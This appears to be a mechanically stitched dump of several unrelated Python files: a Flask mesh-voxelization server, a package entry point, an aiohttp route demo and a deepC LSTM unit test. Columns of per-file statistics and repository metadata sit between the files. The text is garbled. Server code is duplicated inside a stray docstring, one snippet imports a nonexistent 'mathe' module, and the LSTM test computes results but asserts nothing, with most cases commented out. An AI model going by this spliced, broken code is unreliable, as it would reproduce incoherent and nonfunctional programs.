#union_vox.marching_cubes.export('fin_marching_cubes.ply')
ret_dict = {
'assembled_model': str(fin_mesh_ascii,encoding='ascii'),
'each_part_mesh': [str(t.export(file_type='ply',encoding='ascii') ,encoding='ascii') for t in trimesh_mesh]
}
res = jsonify(ret_dict)
return res
"""
@app.route('/generateTransformedResults',methods=['POST'])
def generateTransformedResults():
request_dict = json.loads(request.data)
print(request_dict.keys())
mesh_arr = []
tranform_arr = []
scale_arr = []
trimesh_mesh = []
part_vox_info_arr = []
#print(request_dict['scale_arr'],request_dict['transform_arr'])
for i in range(len(request_dict['scale_arr'])):
scale_arr.append(np.array([request_dict['scale_arr'][i][0],request_dict['scale_arr'][i][1],request_dict['scale_arr'][i][2]]) )
tranform_arr.append(np.array([request_dict['transform_arr'][i][0],request_dict['transform_arr'][i][1],request_dict['transform_arr'][i][2]]))
mesh_arr.append(request_dict['mesh_string_arr'][i])
fin_whole_vox = -1
cur_pitch = 1.0/128
occupancy_points = []
b_min = []
b_max = []
for i in range(len(mesh_arr)):
new_mesh = trimesh.load(file_obj= BytesIO(mesh_arr[i].encode(encoding='utf-8')),file_type='ply')
new_mesh.remove_degenerate_faces()
#print('mesh shape',i,new_mesh.vertices.shape,new_mesh.is_watertight)
trimesh.repair.fill_holes(new_mesh)
#print(scale_arr[i],tranform_arr[i])
new_mesh.vertices[:,0] *= scale_arr[i][0]
new_mesh.vertices[:,1] *= scale_arr[i][1]
new_mesh.vertices[:,2] *= scale_arr[i][2]
new_mesh.vertices[:,0] += tranform_arr[i][0]
new_mesh.vertices[:,1] += tranform_arr[i][1]
new_mesh.vertices[:,2] += tranform_arr[i][2]
c_max = np.max(new_mesh.vertices,0)
c_min = np.min(new_mesh.vertices,0)
b_min.append(c_min.tolist())
b_max.append(c_max.tolist())
new_vox = new_mesh.voxelized(pitch=cur_pitch)
print(new_vox.scale)
occupancy_points = occupancy_points + new_vox.indices_to_points(new_vox.sparse_indices).tolist()
#new_mesh.export(str(i)+'.ply')
#print('mesh shape',i,new_mesh.vertices.shape,new_mesh.is_watertight)
trimesh_mesh.append(new_mesh)
#fin_whole_vox = trimesh.voxel.VoxelGrid(encoding=trimesh.voxel.ops.sparse_to_matrix(np.array(occupancy_points)))
b_min = np.min(np.array(b_min),0)
b_max = np.max(np.array(b_max),0)
b_mid = (b_min + b_max )*0.5
occupancy_points = np.array(occupancy_points)
#print("occupancy points shape",np.max((occupancy_points),0),np.min((occupancy_points),0))
occupancy_points += 0.5
occupancy_points *= opt.spaceSize
occupancy_points_int = np.array(occupancy_points, dtype=np.int)
occupancy_points_int = np.clip(occupancy_points_int, a_min=0, a_max=opt.spaceSize-1)
whole_occ_grid = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
whole_occ_grid[occupancy_points_int[:,0],occupancy_points_int[:,1],occupancy_points_int[:,2]] += 1
fin_mesh = extract_mesh(whole_occ_grid.astype(np.float), threshold=opt.thres)
trimesh.smoothing.filter_taubin(fin_mesh,iterations=5)
n_min, n_max = np.min(fin_mesh.vertices,0), np.max(fin_mesh.vertices,0)
fin_mesh.vertices *= (b_max-b_min) / (n_max-n_min)
n_min, n_max = np.min(fin_mesh.vertices,0), np.max(fin_mesh.vertices,0)
n_mid = (n_min + n_max) * 0.5
fin_mesh.vertices += b_mid - n_mid
#fin_mesh.export('full_mesh.ply')
fin_mesh_ascii = fin_mesh.export(file_type='ply',encoding='ascii')
#print(cached_model_list)
# each part pose
# each
ret_dict = {
'assembled_model': str(fin_mesh_ascii,encoding='ascii'),
'each_part_mesh': [str(t.export(file_type='ply',encoding='ascii') ,encoding='ascii') for t in trimesh_mesh]
}
res = jsonify(ret_dict)
return res
"""
if __name__ == '__main__':
app.run(host='localhost', port=11451, debug=True)
| 36.781621
| 149
| 0.639927
| 5,253
| 37,223
| 4.214734
| 0.065867
| 0.020325
| 0.01355
| 0.015854
| 0.843406
| 0.820235
| 0.804607
| 0.801581
| 0.79178
| 0.777868
| 0
| 0.019988
| 0.224485
| 37,223
| 1,012
| 150
| 36.781621
| 0.746978
| 0.06359
| 0
| 0.547393
| 0
| 0
| 0.060837
| 0.016035
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026066
| false
| 0
| 0.056872
| 0
| 0.109005
| 0.011848
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4fd613cf30d8806814712e41217fbe159ecfe831
| 188
|
py
|
Python
|
Python/python_programming_stu/mycode/module_package/package/game/__main__.py
|
min9288/Multicampus
|
2aaac730b35e530f8f91cb1ba41c08ee18d59142
|
[
"MIT"
] | 2
|
2022-01-18T09:27:42.000Z
|
2022-03-29T14:59:00.000Z
|
Python/python_programming_stu/mycode/module_package/package/game/__main__.py
|
min9288/Multicampus
|
2aaac730b35e530f8f91cb1ba41c08ee18d59142
|
[
"MIT"
] | null | null | null |
Python/python_programming_stu/mycode/module_package/package/game/__main__.py
|
min9288/Multicampus
|
2aaac730b35e530f8f91cb1ba41c08ee18d59142
|
[
"MIT"
] | null | null | null |
from mycode.module_package.game.graphic.render import render_test
from mycode.module_package.game.sound.echo import echo_test
if __name__ == '__main__':
render_test()
echo_test()
| 26.857143
| 65
| 0.787234
| 27
| 188
| 4.962963
| 0.518519
| 0.149254
| 0.238806
| 0.343284
| 0.402985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12234
| 188
| 7
| 66
| 26.857143
| 0.812121
| 0
| 0
| 0
| 0
| 0
| 0.042328
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
4ff18bf52ad693e7a04990cc2eb9c2063a75b1e8
| 39
|
py
|
Python
|
modules/python-codes/modules/modules-packages/src/from-example.py
|
drigols/Studies
|
9c293156935b491ded24be6b511daac67fd43538
|
[
"MIT"
] | 1
|
2020-09-06T22:17:19.000Z
|
2020-09-06T22:17:19.000Z
|
modules/python-codes/modules/modules-packages/src/from-example.py
|
drigols/Studies
|
9c293156935b491ded24be6b511daac67fd43538
|
[
"MIT"
] | null | null | null |
modules/python-codes/modules/modules-packages/src/from-example.py
|
drigols/Studies
|
9c293156935b491ded24be6b511daac67fd43538
|
[
"MIT"
] | null | null | null |
from mathe import sqrt
print(sqrt(25))
| 13
| 22
| 0.769231
| 7
| 39
| 4.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0.128205
| 39
| 2
| 23
| 19.5
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
8b10f1af3f1b76bc5695815a64f1f965ec67c9fa
| 130
|
py
|
Python
|
demo/views.py
|
panagiks/aiohttp-route
|
5144ca2a25b08215a6f36091a8300caceb3b18fb
|
[
"MIT"
] | null | null | null |
demo/views.py
|
panagiks/aiohttp-route
|
5144ca2a25b08215a6f36091a8300caceb3b18fb
|
[
"MIT"
] | null | null | null |
demo/views.py
|
panagiks/aiohttp-route
|
5144ca2a25b08215a6f36091a8300caceb3b18fb
|
[
"MIT"
] | null | null | null |
from aiohttp import web
from aiohttp_route import route
@route('GET', '/')
def handler(request):
return web.HTTPNoContent()
| 16.25
| 31
| 0.730769
| 17
| 130
| 5.529412
| 0.647059
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 130
| 7
| 32
| 18.571429
| 0.854545
| 0
| 0
| 0
| 0
| 0
| 0.030769
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
8b22d89e31fa3906abb43ba61f271414ea940793
| 34
|
py
|
Python
|
src/pagnn/datapipe/__init__.py
|
ostrokach/protein-adjacency-net
|
fd3ad0b9034eb61b0187752c1f38f7eed1a8f1dc
|
[
"MIT"
] | 1
|
2022-01-16T12:06:13.000Z
|
2022-01-16T12:06:13.000Z
|
src/pagnn/datapipe/__init__.py
|
ostrokach/protein-adjacency-net
|
fd3ad0b9034eb61b0187752c1f38f7eed1a8f1dc
|
[
"MIT"
] | null | null | null |
src/pagnn/datapipe/__init__.py
|
ostrokach/protein-adjacency-net
|
fd3ad0b9034eb61b0187752c1f38f7eed1a8f1dc
|
[
"MIT"
] | null | null | null |
from .pipebuf import set_buf_size
| 17
| 33
| 0.852941
| 6
| 34
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8cc5fc2613538c6f671ea3177beccd93dc7f3b3c
| 22,129
|
py
|
Python
|
test/swig/LSTM_detailed.py
|
Aalawani686/deepC
|
8c277f7661241367dc0fc994b171374557c5cac7
|
[
"Apache-2.0"
] | null | null | null |
test/swig/LSTM_detailed.py
|
Aalawani686/deepC
|
8c277f7661241367dc0fc994b171374557c5cac7
|
[
"Apache-2.0"
] | null | null | null |
test/swig/LSTM_detailed.py
|
Aalawani686/deepC
|
8c277f7661241367dc0fc994b171374557c5cac7
|
[
"Apache-2.0"
] | null | null | null |
import common
import deepC.dnnc as dc
import numpy as np
import unittest
import sys
class LSTM_detailedTest(unittest.TestCase):
#@unittest.skip("FAIL")
def test_LSTM_1(self):
"""
input_shape: [7, 6, 8]
weight_shape: [1, 72, 8]
recurrence_weight_shape: [1, 72, 18]
bias_shape: [1, 144]
output_shape: [7, 1, 6, 18]
"""
np_X = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_X.npy')
np_W = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_W.npy')
np_R = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_R.npy')
np_B = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_B.npy')
np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_sequence_lens.npy')
np_initial_h = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_initial_h.npy')
np_initial_c = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_initial_c.npy')
np_P = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_P.npy')
dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# print(dc_sequence_lens)
dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
activation_alpha = [0.4966638953530237, 0.43607014563539637, 0.8097313919008828]
activation_beta = [0.12651506658849576, 0.1647539653231257, 0.04623650102301935]
activations = ['tanh', 'relu', 'sigmoid']
clip = 2.135794928171123
direction = "forward"
hidden_size = 18
input_forget = 1
rtr = np.load('swig/result/LSTM/test_LSTM_1/test_LSTM_1_Y.npy')
dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# for d in dcr:
# print(d)
#
# print("MID")
# print(rtr)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
#@unittest.skip("FAIL")
# def test_LSTM_2(self):
# """
# input_shape: [8, 4, 1]
# weight_shape: [2, 64, 1]
# recurrence_weight_shape: [2, 64, 16]
# bias_shape: [2, 128]
# output_shape: [8, 2, 4, 16]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.20332784907676504, 0.22637955219185357, 0.6021193542725863, 0.6168572580474495, 0.40207405192136414, 0.036317260701121845]
# activation_beta = [0.7717703726511062, 0.027305984207814826, 0.8047659241021807, 0.6452577518231254, 0.7319012533727602, 0.25505174775324035]
# activations = ['tanh', 'tanh', 'sigmoid', 'relu', 'sigmoid', 'relu']
# clip = 2.907158875085247
# direction = "bidirectional"
# hidden_size = 16
# input_forget = 10
# rtr = np.load('swig/result/LSTM/test_LSTM_2/test_LSTM_2_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_3(self):
# """
# input_shape: [8, 1, 4]
# weight_shape: [1, 56, 4]
# recurrence_weight_shape: [1, 56, 14]
# bias_shape: [1, 112]
# output_shape: [8, 1, 1, 14]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.5353786525215217, 0.0047814145847226985, 0.17116077889292602]
# activation_beta = [0.8724323449420001, 0.9207316192126214, 0.7391156087035118]
# activations = ['relu', 'sigmoid', 'tanh']
# clip = 7.5397611403351
# direction = "reverse"
# hidden_size = 14
# input_forget = 14
# rtr = np.load('swig/result/LSTM/test_LSTM_3/test_LSTM_3_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_4(self):
# """
# input_shape: [2, 1, 1]
# weight_shape: [2, 72, 1]
# recurrence_weight_shape: [2, 72, 18]
# bias_shape: [2, 144]
# output_shape: [2, 2, 1, 18]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.9860778314893995, 0.12417696210947016, 0.0006744261981547206, 0.24339585920465567, 0.7498252461249489, 0.30754908604622977]
# activation_beta = [0.1603792258866038, 0.1880417110347281, 0.6952466604231525, 0.11767276043277997, 0.61860245840078, 0.6615465711832315]
# activations = ['sigmoid', 'relu', 'sigmoid', 'tanh', 'relu', 'tanh']
# clip = 3.7019881776389996
# direction = "bidirectional"
# hidden_size = 18
# input_forget = 8
# rtr = np.load('swig/result/LSTM/test_LSTM_4/test_LSTM_4_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_5(self):
# """
# input_shape: [2, 3, 10]
# weight_shape: [2, 20, 10]
# recurrence_weight_shape: [2, 20, 5]
# bias_shape: [2, 40]
# output_shape: [2, 2, 3, 5]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.9958868560901981, 0.5615704868314114, 0.5054884381550756, 0.5125119319409338, 0.18310275479264726, 0.4990119412451889]
# activation_beta = [0.2876466600692591, 0.560778821439632, 0.2632346842213401, 0.13121922832510213, 0.8822817678248556, 0.9880592276419286]
# activations = ['tanh', 'relu', 'tanh', 'sigmoid', 'sigmoid', 'relu']
# clip = 6.117108798702516
# direction = "bidirectional"
# hidden_size = 5
# input_forget = 17
# rtr = np.load('swig/result/LSTM/test_LSTM_5/test_LSTM_5_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_6(self):
# """
# input_shape: [7, 5, 9]
# weight_shape: [1, 64, 9]
# recurrence_weight_shape: [1, 64, 16]
# bias_shape: [1, 128]
# output_shape: [7, 1, 5, 16]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.1508855746391079, 0.4507448733258578, 0.41656131175216204]
# activation_beta = [0.5657658415464043, 0.21611300965755376, 0.15922967506138452]
# activations = ['tanh', 'relu', 'sigmoid']
# clip = 3.1767036746309287
# direction = "forward"
# hidden_size = 16
# input_forget = 14
# rtr = np.load('swig/result/LSTM/test_LSTM_6/test_LSTM_6_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_7(self):
# """
# input_shape: [6, 8, 6]
# weight_shape: [2, 40, 6]
# recurrence_weight_shape: [2, 40, 10]
# bias_shape: [2, 80]
# output_shape: [6, 2, 8, 10]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.28920619362824995, 0.747465052565989, 0.661162342694396, 0.8477376049646675, 0.07881817761441567, 0.16208001287665696]
# activation_beta = [0.7627506699799991, 0.6606114297796492, 0.9585330972395699, 0.5549681443136113, 0.059042596260018065, 0.04648254501072813]
# activations = ['sigmoid', 'sigmoid', 'tanh', 'relu', 'relu', 'tanh']
# clip = 3.879685115272961
# direction = "bidirectional"
# hidden_size = 10
# input_forget = 11
# rtr = np.load('swig/result/LSTM/test_LSTM_7/test_LSTM_7_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_8(self):
# """
# input_shape: [5, 1, 9]
# weight_shape: [2, 4, 9]
# recurrence_weight_shape: [2, 4, 1]
# bias_shape: [2, 8]
# output_shape: [5, 2, 1, 1]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.7746672952847123, 0.036382870533804956, 0.4848161740062119, 0.9830896771807061, 0.017064708201858125, 0.6242851269185792]
# activation_beta = [0.2517994027716025, 0.28976631245816886, 0.38611683342345127, 0.13080875018242, 0.40170849770653727, 0.956570288835856]
# activations = ['sigmoid', 'relu', 'sigmoid', 'relu', 'tanh', 'tanh']
# clip = 2.72219901402834
# direction = "bidirectional"
# hidden_size = 1
# input_forget = 20
# rtr = np.load('swig/result/LSTM/test_LSTM_8/test_LSTM_8_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_9(self):
